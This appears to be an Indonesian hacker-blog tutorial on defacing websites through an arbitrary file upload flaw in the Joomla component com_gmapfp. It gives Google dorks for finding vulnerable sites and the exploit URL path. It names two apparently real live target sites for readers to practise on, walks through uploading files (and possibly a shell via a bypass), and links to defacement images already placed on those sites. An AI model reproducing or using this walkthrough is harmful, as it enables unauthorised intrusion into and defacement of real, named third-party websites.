Yow halo exploiter, udah lama gak update konten ya, lagi males n sibuk kerja juga :b. kali ini saya akan menshare tutorial deface exploit com_gmapfp arbitary file upload. exploit ini masih baru ya ( 2020 ) dan gk smua versi gmapfp yg bisa di exploitasi, hanya versi J3.5 saja, ok langsung aja gausah lama2 :D.
#Google Dork :
inurl:"com_gmapfp
inurl:/components/com_gmapfp/
#Exploit : index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
#Live Target :
- https://www.aeroclub-savoie.com/
- https://www.turizam.mostar.ba
1. pertama kalian bisa dorking dlu, atau langsung saja pake live target itu untuk belajar
2. kalian masukkan exploit nya di akhir domain / path
contoh : https://www.aeroclub-savoie.com/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
atau https://www.aeroclub-savoie.com/[PATHNYA]/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
3. jika muncul tempat upload sperti ini silahkan kalian upload file gambar/mungkin kalian juga bisa upload shell ( butuh bypass )
5. dan jika ada alert seperti ini, itu tandanya file berhasil di upload
6. dan cara akses filenya target.com/images/gmapfp/filemu.jpg atau target.com/images/stories/gmapfp/filemu.jpg
7. and boom
- https://www.aeroclub-savoie.com/images/gmapfp/pwn.gif
- https://www.turizam.mostar.ba/images/stories/gmapfp/pwn.gif
Ok ini saja yg bisa saya sampaikan, jika kurang paham silahkan tinggalkan pertanyaan di forum chat